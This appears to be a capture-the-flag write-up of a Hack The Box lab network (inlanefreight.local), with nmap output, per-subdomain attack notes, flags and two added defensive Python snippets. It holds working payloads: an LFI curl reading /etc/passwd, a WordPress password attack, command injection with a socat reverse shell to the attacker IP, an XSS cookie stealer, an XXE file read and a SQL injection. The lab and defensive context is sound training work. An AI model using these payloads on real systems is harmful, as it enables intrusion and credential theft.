10.129.229.147

NMAP

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              38 May 30  2022 flag.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.44
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7108b0c4f3ca9757649770f9fec50c7b (RSA)
|   256 45c3b51463993d9eb32251e59776e150 (ECDSA)
|_  256 2ec2416646efb68195d5aa3523945538 (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp   open  domain   (unknown banner: 1337_HTB_DNS)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    1337_HTB_DNS
| dns-nsid:
|_  bind.version: 1337_HTB_DNS
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Inlanefreight
110/tcp  open  pop3     Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP SASL AUTH-RESP-CODE RESP-CODES STLS PIPELINING UIDL
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
143/tcp  open  imap     Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
|_imap-capabilities: STARTTLS IDLE LOGINDISABLEDA0001 post-login IMAP4rev1 listed have more capabilities ENABLE OK ID SASL-IR Pre-login LITERAL+ LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
|_imap-capabilities: IDLE have post-login IMAP4rev1 capabilities listed more LITERAL+ ENABLE OK ID SASL-IR Pre-login AUTH=PLAINA0001 LOGIN-REFERRALS
995/tcp  open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-05-30T17:15:40
|_Not valid after:  2032-05-27T17:15:40
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA TOP AUTH-RESP-CODE PIPELINING RESP-CODES SASL(PLAIN) USER UIDL
8080/tcp open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Support Center
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.93%I=7%D=1/10%Time=6962DF83%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,39,"\x007\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\r\x0c1337_HTB_DNS");
Service Info: Host:  ubuntu; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Foothold

FTP

  • FTP enum returned a flag - HTB{0eb0ab788df18c3115ac43b1c06ae6c4}

DNS

  • Zone transfer returned the available subdomains and a flag in a TXT record

HTTP

  • inlanefreight.local
  • monitoring.inlanefreight.local
  • blog.inlanefreight.local
  • careers.inlanefreight.local
  • dev.inlanefreight.local
  • flag.inlanefreight.local - returned a flag in the DNS TXT record: HTB{DNs_ZOn3_Tr@nsf3r}
  • gitlab.inlanefreight.local
  • ir.inlanefreight.local
  • status.inlanefreight.local
  • support.inlanefreight.local
  • tracking.inlanefreight.local
  • vpn.inlanefreight.local

inlanefreight.local

  • directory listing on /images

blog.inlanefreight.local

  • Drupal website

careers.inlanefreight.local

  • register a user
  • log in as that user; profile?id=4 is vulnerable to IDOR
  • id=4 returns the flag HTB{8f40ecf17f681612246fa5728c159e46}

dev.inlanefreight.local

  • key vault site
  • ffuf with the raft wordlist finds uploads.php, which has TRACE enabled.
  • the response headers to TRACE return an `X
  • use that header in the TRACE request to get a valid page and open the response in the browser
  • upload a php-reverse-shell.phar file by changing the MIME type and get a reverse shell
  • find HTB{57c7f6d939eeda90aa1488b15617b9fa}
  • we are in a Docker container

gitlab.inlanefreight.local

  • registered a new user to find the flag - HTB{32596e8376077c3ef8d5cf52f15279ba}
  • CVE-2022-2884
  • found shopdev2.inlanefreight.local

ir.inlanefreight.local

  • WordPress 6.0
  • ran wpscan
  • mail-masta plugin -> curl -s http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
  • enumerating users
    • wpscan --url http://ir.inlanefreight.local --enumerate u --no-update
    • wpscan --password-attack xmlrpc -t 20 -U ilfreightwp -P /opt/SecLists/mine/password.list --url 'http://ir.inlanefreight.local/' --no-update
      • found ilfreightwp:password1
  • edit the Twenty Twenty theme's 404.php and get the flag
  • HTB{e7134abea7438e937b87608eab0d979c}
  • has interesting files

monitoring.inlanefreight.local

  • /ping.php?ip=127.0.0.1%0d%0als
  • get flag on monitoring.inlanefreight.local/ping.php?ip=127.0.0.1%0d%0aCat${IFS}00112233_flag.txt
    • HTB{bdd8a93aff53fd63a0a14de4eba4cbc1}
  • getting a reverse shell
    • /ping.php?ip=127.0.0.1%0d%0asocat${IFS}TCP:10.10.14.44:9001${IFS}EXEC:${PATH:0:1}bin${PATH:0:1}bash
    • returns shell as webdev
    • GO TO 2.md
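Added here as a defender's counterpart to the ping.php notes above (this is not code from the original write-up): a small detector that walks Apache access-log lines, percent-decodes the `ip` parameter of ping.php requests and flags any value that is not a single IP literal, which is exactly what the %0d%0a and ${IFS} requests look like once decoded. The log lines are constructed for the example; the path, field names and timestamps are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (not taken from the original notes);
# the requests mirror the ones sent to monitoring.inlanefreight.local/ping.php.
SAMPLE_LOG = """\
10.10.14.44 - - [10/Jan/2026:12:00:01 +0000] "GET /ping.php?ip=127.0.0.1 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.10.14.44 - - [10/Jan/2026:12:00:07 +0000] "GET /ping.php?ip=127.0.0.1%0d%0als HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.14.44 - - [10/Jan/2026:12:00:15 +0000] "GET /ping.php?ip=127.0.0.1%0d%0aCat${IFS}00112233_flag.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.44 - - [10/Jan/2026:12:00:30 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# Characters that break out of a command line once the parameter is decoded:
# CR/LF (the %0d%0a trick), command separators and the ${IFS} construct.
SHELL_META = set("\r\n;|&`$(){}")

def is_plain_ip(value: str) -> bool:
    """True only if the whole decoded value is a single IPv4/IPv6 literal."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def suspicious_ping_requests(log_text: str) -> list[dict]:
    """Return every ping.php request whose ip= parameter is not a bare IP."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/ping.php"):
            continue
        # parse_qs percent-decodes, so %0d%0a is a real CR/LF from here on.
        for value in parse_qs(url.query, keep_blank_values=True).get("ip", []):
            if is_plain_ip(value):
                continue
            meta = sorted(c for c in SHELL_META if c in value)
            hits.append({"src": m["src"], "ts": m["ts"], "ip": value,
                         "reason": f"shell metacharacters {meta}" if meta else "not an IP literal"})
    return hits

if __name__ == "__main__":
    for hit in suspicious_ping_requests(SAMPLE_LOG):
        print(hit)
```

The same validation (`is_plain_ip` on the decoded value before it ever reaches a shell) is the fix on the server side; the detector only mirrors it over the log.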

status.inlanefreight.htb

  • has a union-based SQLi
  • dumped the users table (below)
    +----+-----------------------------------+----------+
    | id | password                          | username |
    +----+-----------------------------------+----------+
    | 1  | 4528342e54d6f8f8cf15bf6e3c31bf1f6 | Admin    |
    | 2  | 1fbea4df249ac4f4881a5da387eb297cf | Flag     |
    +----+-----------------------------------+----------+
  • admin hash not cracked

support.inlanefreight.local

  • has ticket.php and a subscribe email field
  • on ticket.php - message field; start nc as a listener
    • "><script>document.location='http://10.10.14.44/grabber.php?c='+btoa(document.cookie)</script>
    • a base64-encoded cookie arrives on nc.
  • add the cookie via the browser dev tools (Inspect Element) and go to the login page.
  • HTB{1nS3cuR3_c00k135}
  • login is not vulnerable to SQLi

shopdev2.inlanefreight.local

  • log in using admin:admin
  • go to the cart and try checking out; notice the XML request body (XXE)
  • <!DOCTYPE foo [<!ENTITY xxe5ld2x SYSTEM "file:///flag.txt"> ]> to get the flag HTB{dbca4dc5d99cdb3311404ea74921553c}
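Added as the hardened side of the checkout XXE above (not code from the original write-up or the shop): a stdlib-only parser that vetoes any DOCTYPE with an expat handler before a tree is built, so the entity in the payload is never declared, let alone expanded. The checkout element names and the two sample bodies are constructed for the example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed checkout bodies (not taken from the original notes). XXE_BODY
# carries the DOCTYPE recorded against shopdev2.inlanefreight.local; the
# element names around it are assumed.
XXE_BODY = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe5ld2x SYSTEM "file:///flag.txt"> ]>
<checkout><item id="1"/><note>&xxe5ld2x;</note></checkout>"""

CLEAN_BODY = """<?xml version="1.0"?>
<checkout><item id="1"/><item id="7"/><note>leave at door</note></checkout>"""

class DtdNotAllowed(ValueError):
    """Raised as soon as a DOCTYPE shows up, before any entity is declared."""

def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise DtdNotAllowed(f"DOCTYPE {name!r} rejected")

def parse_checkout(body: str) -> dict:
    """Parse a checkout document, refusing any DTD.

    Step 1 runs a bare expat pass whose only handler vetoes DOCTYPE; an
    exception raised in the handler aborts the parse. Step 2 builds the
    tree only for documents that passed, so no entity (internal, external
    or parameter) can ever be expanded.
    """
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _reject_doctype
    guard.Parse(body, True)
    root = ET.fromstring(body)
    return {
        "items": [item.get("id") for item in root.iter("item")],
        "note": (root.findtext("note") or "").strip(),
    }

def checkout_is_safe(body: str) -> bool:
    """Accept/reject answer for callers that do not need the parsed data."""
    try:
        parse_checkout(body)
        return True
    except (DtdNotAllowed, ET.ParseError, expat.ExpatError):
        return False

if __name__ == "__main__":
    print(parse_checkout(CLEAN_BODY))
    print("XXE body accepted?", checkout_is_safe(XXE_BODY))
```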

tracking.inlanefreight.local

  • nothing much here; a PDF is returned
  • the PDF contains the tracking number we entered
  • https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators
  • HTB{49f0bad299687c62334182178bfd75d8}

vpn.inlanefreight.local

  • login page